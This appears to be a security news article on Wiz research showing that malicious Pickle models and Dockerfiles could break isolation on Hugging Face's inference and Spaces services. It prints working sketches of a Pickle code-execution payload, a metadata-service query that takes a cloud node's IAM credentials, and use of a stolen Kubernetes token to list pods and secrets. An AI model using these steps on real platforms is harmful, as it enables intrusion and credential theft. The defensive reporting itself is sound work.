AI-as-a-Service Platform Flaw Allows Hackers to Escalate Privileges

Hugging Face is an open platform for AI development that lets users train, store, and share machine learning models and datasets, serving as a central hub where the AI community collaborates and experiments with pre-trained models.

Due to its popularity and role in the AI ecosystem, Hugging Face is a potential target for attackers who could gain access to sensitive AI models and datasets, posing a risk to the broader AI supply chain.  

Researchers found significant flaws in AI-as-a-service providers that attackers could use to deploy malicious models. By abusing the inference process, which deserializes untrusted Pickle-format files, they could execute code without authorization and potentially compromise other users' models stored by those providers.

AI-as-a-Service attack flow

Attackers could also tamper with the CI/CD pipeline by injecting malicious code into AI applications, creating a supply chain attack within the AI-as-a-service platform. This demonstrates the danger of shared resources and the importance of strong security measures from AI service providers.

AI/ML applications are made up of three parts: models, application code, and inference infrastructure. Each part faces distinct threats: adversarial inputs that manipulate a model's predictions, vulnerable application code, and malicious models executed by the inference infrastructure.

The lack of tools to verify model integrity makes trusting downloaded models risky. The research demonstrates how a malicious model can be used to exploit Hugging Face's infrastructure and suggests methods to mitigate the risk.
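One widely recommended mitigation is loading weights from the Safetensors format, which stores only raw tensors and metadata and therefore cannot embed executable code. A minimal sketch, assuming the safetensors package is installed and a weights file has already been downloaded (the filename is a placeholder):

```python
# Safetensors files contain only tensor data, so loading them cannot
# trigger arbitrary code execution the way Pickle deserialization can.
from safetensors.torch import load_file

# "model.safetensors" is a placeholder path to an already-downloaded file.
weights = load_file("model.safetensors")  # dict: parameter name -> tensor
print(list(weights.keys())[:5])
```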

Researchers at Wiz examined isolation vulnerabilities in AI-as-a-service (AIaaS) platforms, concerned about malicious actors exploiting shared compute resources. 

Inference API feature available for the model gpt2 on Hugging Face

They focused on three key Hugging Face offerings: Inference API (allowing model experimentation without local installs), Inference Endpoints (managed service for production deployments), and Spaces (for hosting and collaborating on AI applications). 
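For illustration, the hosted Inference API can be queried over plain HTTP. A hedged sketch using the requests library; the endpoint is the public one documented at the time of the research, and the token is a placeholder:

```python
import requests

# Query the hosted Inference API for the public gpt2 model.
# "hf_xxx" is a placeholder for a real Hugging Face access token.
API_URL = "https://api-inference.huggingface.co/models/gpt2"
headers = {"Authorization": "Bearer hf_xxx"}

resp = requests.post(API_URL, headers=headers,
                     json={"inputs": "Hello, world"})
print(resp.json())  # generated continuation, or an error payload
```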

The investigation aimed to determine whether AI models running on these platforms were sufficiently isolated to prevent unauthorized access or interference between users. While examining Hugging Face's inference offerings, the researchers noted that users can upload custom models.

Comparison between different AI model formats, as stated on Safetensors’ GitHub page

This raised a security question: could a malicious model be uploaded to execute arbitrary code within the Inference API? The PyTorch Pickle format, long known to permit remote code execution (RCE) on deserialization, was chosen for the experiment.
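To see why Pickle is dangerous, consider that unpickling can invoke arbitrary callables via __reduce__. A minimal sketch; the class name and command are illustrative, not the researchers' actual payload:

```python
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        # Called during unpickling, e.g. inside torch.load();
        # returns a callable and its arguments to execute.
        return (os.system, ("id > /tmp/pwned",))

blob = pickle.dumps(MaliciousPayload())
# pickle.loads(blob) would run the command above on the loading host.
```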

Example of the malware scanning result of an uploaded model on Hugging Face

Hugging Face scans uploaded Pickle files but, because of their widespread community use, still allows inference on flagged models. The researchers therefore uploaded a malicious Pickle model to test whether the Inference API would execute its code and, if so, in what environment (sandboxed or shared with other users).
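Publishing such a model requires nothing beyond a normal account. A hedged sketch with the official huggingface_hub client; the repository name and token are placeholders:

```python
from huggingface_hub import HfApi

api = HfApi(token="hf_xxx")  # placeholder access token

# "some-user/demo-model" is a hypothetical repository for illustration.
api.create_repo("some-user/demo-model", exist_ok=True)

# Upload a pickle-serialized PyTorch weights file to the model repo.
api.upload_file(
    path_or_fileobj="pytorch_model.bin",
    path_in_repo="pytorch_model.bin",
    repo_id="some-user/demo-model",
)
```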

Exploiting this RCE vulnerability in the Hugging Face Inference API, the researchers gained an attacker's foothold in a Kubernetes pod running on Amazon EKS.

From that pod, they retrieved a valid Kubernetes token with node privileges by querying the instance metadata service (IMDS), abusing an insecure default configuration that allows pods to obtain the node's identity and IAM role.
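A minimal sketch of that metadata query, assuming IMDSv1 is reachable from the pod; the returned node-role credentials can then be exchanged for a Kubernetes token (e.g., via aws eks get-token):

```python
import json
import urllib.request

IMDS = "http://169.254.169.254/latest/meta-data"

def fetch(path: str) -> str:
    # Unauthenticated IMDSv1-style GET; fails if network policy or
    # IMDSv2 hop limits block the metadata service from pods.
    with urllib.request.urlopen(f"{IMDS}/{path}", timeout=2) as resp:
        return resp.read().decode()

# The node's IAM role name, then its temporary credentials.
role = fetch("iam/security-credentials/").strip()
creds = json.loads(fetch(f"iam/security-credentials/{role}"))
print(role, creds["AccessKeyId"])
```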

Reverse shell from Hugging Face upon inference of a specially crafted AI model

This token allowed them to list pod information and read cluster secrets, potentially enabling lateral movement within the EKS cluster, as sketched below. Separately, the researchers exploited a weakness in Hugging Face Spaces by crafting a Dockerfile that executed malicious code during the image build process.
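A hedged sketch of what such a stolen token permits, using the official kubernetes Python client; the API endpoint and token are placeholders:

```python
from kubernetes import client

cfg = client.Configuration()
cfg.host = "https://EXAMPLE-EKS-ENDPOINT"               # placeholder API server
cfg.api_key = {"authorization": "Bearer STOLEN_TOKEN"}  # placeholder token
cfg.verify_ssl = False                                  # illustration only

v1 = client.CoreV1Api(client.ApiClient(cfg))

# With node-level privileges, an attacker can enumerate workloads
# across namespaces and read any secrets the token authorizes.
for pod in v1.list_pod_for_all_namespaces().items:
    print(pod.metadata.namespace, pod.metadata.name)
```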

The malicious Dockerfile used in the research

The build process also gave them access to an internal container registry shared among users; because of insufficient access controls, they could have overwritten other users' container images, potentially compromising their deployed applications.
